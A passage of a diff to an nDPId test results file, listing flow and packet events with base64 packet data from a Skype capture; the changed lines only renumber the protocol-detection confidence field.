00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2366,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":3,"flow_last_seen":1431969725886,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969725886,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0FRFAAEAGrszAqAEilQ0gD8PUNFDIS2mTZKVBg4AQECzp4QAAAQEICj4jz2Q\/guiR"} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2379,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":3,"flow_last_seen":1431969726134,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969726134,"pkt":"0NQSxnP1PBXCt3IOCABFAABLBEcAAEAR8ufAqAEiwKgBAfe9ADUAN4CxqiYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2380,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":3,"flow_last_seen":1431969726134,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969726134,"pkt":"0NQSxnP1PBXCt3IOCABFAABLzWEAAEARKc3AqAEiwKgBAf4NADUANx167A0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2401,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969714165,"flow_last_seen":1431969726969,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969726969,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2401,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969714165,"flow_last_seen":1431969726969,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969726969,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2410,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969727446,"flow_last_seen":1431969727446,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969727446,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2410,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":1,"flow_last_seen":1431969727446,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969727446,"pkt":"0NQSxnP1PBXCt3IOCABFAABAw6JAAEAGAC\/AqAEilQ0gD8PVNFDxI3WvAAAAALAC\/\/9NiQAAAgQFtAEDAwUBAQgKPiPVcAAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2412,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":2,"flow_last_seen":1431969727498,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969727498,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQw9XOgDWr8SN1sKASOJC1wgAAAgQFrAQCCAo\/fSyFPiPVcAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2413,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":3,"flow_last_seen":1431969727498,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969727498,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0a9FAAEAGWAzAqAEilQ0gD8PVNFDxI3WwzoA1rIAQECwMugAAAQEICj4j1aM\/fSyF"} -00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2424,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1431969727446,"flow_last_seen":1431969727669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1391,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1431969727669,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2424,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1431969727446,"flow_last_seen":1431969727669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1391,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1431969727669,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2451,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1431969728511,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1431969728511,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAABIsLcAAEARRULAqAFcwKgB\/+EV4RUANFGUU3BvdFVkcDB5FYpWEIvHwwABAARIlcIDhMAbG8d8ZX7RWey9o+VAQ2IEJyw="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2460,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969728749,"flow_last_seen":1431969728749,"flow_idle_time":200000,"flow_min_l4_payload_len":499,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":499,"midstream":0,"thread_ts_msec":1431969728749,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"239.255.255.250","src_port":50084,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01110{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2460,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":1,"flow_last_seen":1431969728749,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":541,"pkt_l4_len":507,"thread_ts_msec":1431969728749,"pkt":"AQBef\/\/6xCwDBkn+CABFAAIPEXQAAAER9GvAqAFc7\/\/\/+sOkB2wB+wkMTk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6Q29ubmVjdGlvbk1hbmFnZXI6MQ0KTlRTOnNzZHA6YWxpdmUNCkxvY2F0aW9uOmh0dHA6Ly8xMC4yMTEuNTUuMzoyODY5L3VwbnBob3N0L3VkaGlzYXBpLmRsbD9jb250ZW50PXV1aWQ6MmNiYzc4NWUtMjVmNC00MGNhLTk4YjUtMGQ1ODA0YWRhYThlDQpVU046dXVpZDoyY2JjNzg1ZS0yNWY0LTQwY2EtOThiNS0wZDU4MDRhZGFhOGU6OnVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6Q29ubmVjdGlvbk1hbmFnZXI6MQ0KQ2FjaGUtQ29udHJvbDptYXgtYWdlPTkwMA0KU2VydmVyOk1pY3Jvc29mdC1XaW5kb3dzLU5ULzUuMSBVUG5QLzEuMCBVUG5QLURldmljZS1Ib3N0LzEuMA0KT1BUOiJodHRwOi8vc2NoZW1hcy51cG5wLm9yZy91cG5wLzEvMC8iOyBucz0wMQ0KMDEtTkxTOmQ0NmQ1MDA5ZTE0NzFiYTY4MDBlNDNlN2YwZTEyZWU0DQoNCg=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2460,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969728749,"flow_last_seen":1431969728749,"flow_idle_time":200000,"flow_min_l4_payload_len":499,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":499,"midstream":0,"thread_ts_msec":1431969728749,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"239.255.255.250","src_port":50084,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2460,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969728749,"flow_last_seen":1431969728749,"flow_idle_time":200000,"flow_min_l4_payload_len":499,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":499,"midstream":0,"thread_ts_msec":1431969728749,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"239.255.255.250","src_port":50084,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 01106{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2461,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":2,"flow_last_seen":1431969728750,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":539,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":539,"pkt_l4_len":505,"thread_ts_msec":1431969728750,"pkt":"AQBef\/\/6xCwDBkn+CABFAAIN8CkAAAERFbjAqAFc7\/\/\/+sOkB2wB+afnTk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6Q29udGVudERpcmVjdG9yeToxDQpOVFM6c3NkcDphbGl2ZQ0KTG9jYXRpb246aHR0cDovLzEwLjIxMS41NS4zOjI4NjkvdXBucGhvc3QvdWRoaXNhcGkuZGxsP2NvbnRlbnQ9dXVpZDoyY2JjNzg1ZS0yNWY0LTQwY2EtOThiNS0wZDU4MDRhZGFhOGUNClVTTjp1dWlkOjJjYmM3ODVlLTI1ZjQtNDBjYS05OGI1LTBkNTgwNGFkYWE4ZTo6dXJuOnNjaGVtYXMtdXBucC1vcmc6c2VydmljZTpDb250ZW50RGlyZWN0b3J5OjENCkNhY2hlLUNvbnRyb2w6bWF4LWFnZT05MDANClNlcnZlcjpNaWNyb3NvZnQtV2luZG93cy1OVC81LjEgVVBuUC8xLjAgVVBuUC1EZXZpY2UtSG9zdC8xLjANCk9QVDoiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzpkNDZkNTAwOWUxNDcxYmE2ODAwZTQzZTdmMGUxMmVlNA0KDQo="} 01023{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2462,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":3,"flow_last_seen":1431969728750,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":475,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":475,"pkt_l4_len":441,"thread_ts_msec":1431969728750,"pkt":"AQBef\/\/6xCwDBkn+CABFAAHN3wIAAAERJx\/AqAFc7\/\/\/+sOkB2wBuX63Tk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnVwbnA6cm9vdGRldmljZQ0KTlRTOnNzZHA6YWxpdmUNCkxvY2F0aW9uOmh0dHA6Ly8xMC4yMTEuNTUuMzoyODY5L3VwbnBob3N0L3VkaGlzYXBpLmRsbD9jb250ZW50PXV1aWQ6MmNiYzc4NWUtMjVmNC00MGNhLTk4YjUtMGQ1ODA0YWRhYThlDQpVU046dXVpZDoyY2JjNzg1ZS0yNWY0LTQwY2EtOThiNS0wZDU4MDRhZGFhOGU6OnVwbnA6cm9vdGRldmljZQ0KQ2FjaGUtQ29udHJvbDptYXgtYWdlPTkwMA0KU2VydmVyOk1pY3Jvc29mdC1XaW5kb3dzLU5ULzUuMSBVUG5QLzEuMCBVUG5QLURldmljZS1Ib3N0LzEuMA0KT1BUOiJodHRwOi8vc2NoZW1hcy51cG5wLm9yZy91cG5wLzEvMC8iOyBucz0wMQ0KMDEtTkxTOmQ0NmQ1MDA5ZTE0NzFiYTY4MDBlNDNlN2YwZTEyZWU0DQoNCg=="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2528,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969735255,"flow_last_seen":1431969735255,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969735255,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"106.188.249.186","src_port":13021,"dst_port":15120,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2528,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":1,"flow_last_seen":1431969735255,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969735255,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuQGgAAEARFBbAqAEiarz5ujLdOxAAGjrunqMCSv26L3gQtCJn9dl5F8Bv"} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2528,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969735255,"flow_last_seen":1431969735255,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969735255,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"106.188.249.186","src_port":13021,"dst_port":15120,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2528,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969735255,"flow_last_seen":1431969735255,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969735255,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"106.188.249.186","src_port":13021,"dst_port":15120,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2580,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969715510,"flow_last_seen":1431969745372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2872,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1431969745372,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50117,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2593,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":56886,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2593,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":1,"flow_last_seen":1431969745776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1431969745776,"pkt":"AQBef\/\/6PBXCt3IOCABFAACh3hQAAAERKXPAqAEi7\/\/\/+t42B2wAjVUWTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOUFBQQ29ubmVjdGlvbjoxDQoNCg=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2593,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":56886,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2593,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":56886,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2594,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":2,"flow_last_seen":1431969745776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1431969745776,"pkt":"AQBef\/\/6PBXCt3IOCABFAACg2\/EAAAERK5fAqAEi7\/\/\/+t42B2wAjLsJTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOSVBDb25uZWN0aW9uOjENCg0K"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2595,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":64560,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2595,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":1,"flow_last_seen":1431969745776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1431969745776,"pkt":"AQBef\/\/6PBXCt3IOCABFAAChjL0AAAEResrAqAEi7\/\/\/+vwwB2wAjTccTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOUFBQQ29ubmVjdGlvbjoxDQoNCg=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2595,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":64560,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2595,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":64560,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2596,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":2,"flow_last_seen":1431969745776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1431969745776,"pkt":"AQBef\/\/6PBXCt3IOCABFAACgyNwAAAERPqzAqAEi7\/\/\/+vwwB2wAjJ0PTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOSVBDb25uZWN0aW9uOjENCg0K"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2597,"source":"skype.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49511,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2597,"source":"skype.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":1,"flow_last_seen":1431969745776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969745776,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoljUAAEARYRzAqAEiwKgBAcFnFOcAFDI4AAEAADLdMt0AAA4Q"} @@ -1024,10 +1024,10 @@ 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2652,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":3,"flow_last_seen":1431969750865,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969750865,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0wMFAAEAG5dDAqAEinTg1L8PWMD5iE\/Tgs4ZWUYAQECwY2QAAAQEICj4kMLtiCpO7"} 00540{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2660,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969751302,"flow_last_seen":1431969751302,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969751302,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2660,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":1431969751302,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":12,"thread_ts_msec":1431969751302,"pkt":"AQBeAAAB0NQSxnP1CABGwAAkAABAAAECQmnAqAEB4AAAAZQEAAARZOweAAAAAAJ9AAAAAAAAAAAAAAAA"} -00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2660,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969751302,"flow_last_seen":1431969751302,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969751302,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 